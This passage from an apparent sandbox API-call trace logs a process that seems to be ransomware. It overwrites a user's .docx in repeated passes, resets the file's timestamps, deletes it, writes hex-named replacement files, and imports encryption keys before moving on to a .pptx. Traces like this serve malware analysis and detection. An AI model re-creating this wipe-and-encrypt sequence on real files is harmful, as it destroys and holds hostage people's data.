lpBuffer=0x2366f40*, lpNumberOfBytesRead=0x1bf5da48*=0x260, lpOverlapped=0x0) returned 1 [0071.480] ReadFile (in: hFile=0x36c, lpBuffer=0x2366f40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2366f40*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0071.480] CloseHandle (hObject=0x36c) returned 1 [0071.482] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062.info", lpFilePart=0x0) returned 0x4d [0071.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0071.482] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b0d703bce4dec0768914707f8b022062.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0071.746] GetFileType (hFile=0x36c) returned 0x1 [0071.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0071.749] GetFileType (hFile=0x36c) returned 0x1 [0071.755] WriteFile (in: hFile=0x36c, lpBuffer=0x23735f0*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x23735f0*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0071.757] CloseHandle (hObject=0x36c) returned 1 [0071.758] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", lpFilePart=0x0) returned 0x32 [0071.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0071.759] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1g4jk.docx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51bbabd0, ftCreationTime.dwHighDateTime=0x1d4c7ec, ftLastAccessTime.dwLowDateTime=0x16fb65e0, ftLastAccessTime.dwHighDateTime=0x1d4cd27, ftLastWriteTime.dwLowDateTime=0x16fb65e0, ftLastWriteTime.dwHighDateTime=0x1d4cd27, nFileSizeHigh=0x0, nFileSizeLow=0xa25a)) returned 1 [0071.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0071.811] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", lpFilePart=0x0) returned 0x32 [0071.812] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", dwFileAttributes=0x80) returned 1 [0071.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", lpFilePart=0x0) returned 0x32 [0071.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0071.820] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1g4jk.docx"), fInfoLevelId=0x0, lpFileInformation=0x237b1c8 | out: lpFileInformation=0x237b1c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x51bbabd0, ftCreationTime.dwHighDateTime=0x1d4c7ec, ftLastAccessTime.dwLowDateTime=0x16fb65e0, ftLastAccessTime.dwHighDateTime=0x1d4cd27, ftLastWriteTime.dwLowDateTime=0x16fb65e0, ftLastWriteTime.dwHighDateTime=0x1d4cd27, nFileSizeHigh=0x0, nFileSizeLow=0xa25a)) returned 1 [0071.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0071.828] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", lpFilePart=0x0) returned 0x32 [0071.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0071.830] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1g4jk.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0071.832] GetFileType (hFile=0x36c) returned 0x1 [0071.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0071.834] GetFileType (hFile=0x36c) returned 0x1 [0071.836] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0071.860] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0071.882] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.302] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.312] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.313] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.314] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.315] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.316] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.316] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.317] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.317] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5daa8*=0x400, lpOverlapped=0x0) returned 1 [0072.317] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.318] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.319] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.320] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.320] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.330] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.331] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.332] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.333] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.333] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.334] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.334] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5daa8*=0x400, lpOverlapped=0x0) returned 1 [0072.334] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.335] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.336] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.337] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.337] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.338] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.339] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.339] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.340] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.341] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.342] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0072.342] WriteFile (in: hFile=0x36c, lpBuffer=0x237b630*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x237b630*, lpNumberOfBytesWritten=0x1bf5daa8*=0x400, lpOverlapped=0x0) returned 1 [0072.342] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0072.343] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0072.343] SetEndOfFile (hFile=0x36c) returned 1 [0072.344] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0072.344] CloseHandle (hObject=0x36c) returned 1 [0072.345] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", lpFilePart=0x0) returned 0x32 [0072.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0072.345] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1g4jk.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.345] GetFileType (hFile=0x36c) returned 0x1 [0072.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0072.345] GetFileType (hFile=0x36c) returned 0x1 [0072.345] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0072.345] CloseHandle (hObject=0x36c) returned 1 [0072.345] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", lpFilePart=0x0) returned 0x32 [0072.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0072.345] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1g4jk.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.345] GetFileType (hFile=0x36c) returned 0x1 [0072.345] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0072.345] GetFileType (hFile=0x36c) returned 0x1 [0072.345] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0072.346] CloseHandle (hObject=0x36c) returned 1 [0072.346] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", lpFilePart=0x0) returned 0x32 [0072.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0072.346] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1g4jk.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.346] GetFileType (hFile=0x36c) returned 0x1 [0072.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0072.346] GetFileType (hFile=0x36c) returned 0x1 [0072.346] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0072.346] CloseHandle (hObject=0x36c) returned 1 [0072.346] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", lpFilePart=0x0) returned 0x32 [0072.346] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1g4jk.docx")) returned 1 [0072.347] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1G4JK.docx", lpFilePart=0x0) returned 0x32 [0072.347] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062", lpFilePart=0x0) returned 0x48 [0072.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0072.347] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b0d703bce4dec0768914707f8b022062"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.347] GetFileType (hFile=0x36c) returned 0x1 [0072.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0072.347] GetFileType (hFile=0x36c) returned 0x1 [0072.347] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0072.347] CloseHandle (hObject=0x36c) returned 1 [0072.348] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062", lpFilePart=0x0) returned 0x48 [0072.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0072.348] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b0d703bce4dec0768914707f8b022062"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.348] GetFileType (hFile=0x36c) returned 0x1 [0072.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0072.348] GetFileType (hFile=0x36c) returned 0x1 [0072.348] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0072.348] CloseHandle (hObject=0x36c) returned 1 [0072.348] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062", lpFilePart=0x0) returned 0x48 [0072.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0072.348] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0D703BCE4DEC0768914707F8B022062" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b0d703bce4dec0768914707f8b022062"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.348] GetFileType (hFile=0x36c) returned 0x1 [0072.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0072.348] GetFileType (hFile=0x36c) returned 0x1 [0072.348] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0072.348] CloseHandle (hObject=0x36c) returned 1 [0072.349] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", lpFilePart=0x0) returned 0x3b [0072.349] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", lpFilePart=0x0) returned 0x3b [0072.350] CryptImportKey (in: hProv=0x1a5b7d10, pbData=0x237e998, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a626ad0) returned 1 [0072.350] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0072.350] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0072.350] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x237ea88, pdwDataLen=0x1bf5db30 | out: pbData=0x237ea88*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0072.350] CryptImportKey (in: hProv=0x1a5b7d10, pbData=0x237eba8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626a60) returned 1 [0072.350] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0072.350] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0072.350] CryptDuplicateKey (in: hKey=0x1a626a60, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626f30) returned 1 [0072.350] CryptContextAddRef (hProv=0x1a5b7d10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0072.350] CryptSetKeyParam (hKey=0x1a626f30, dwParam=0x4, pbData=0x237ecf0*=0x1, dwFlags=0x0) returned 1 [0072.350] CryptSetKeyParam (hKey=0x1a626f30, dwParam=0x1, pbData=0x237eca0, dwFlags=0x0) returned 1 [0072.350] CryptDestroyKey (hKey=0x1a626a60) returned 1 [0072.350] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0072.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4rRbNGpZmiXP3k.pptx", lpFilePart=0x0) returned 0x3b [0072.351] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0072.351] CreateFileW 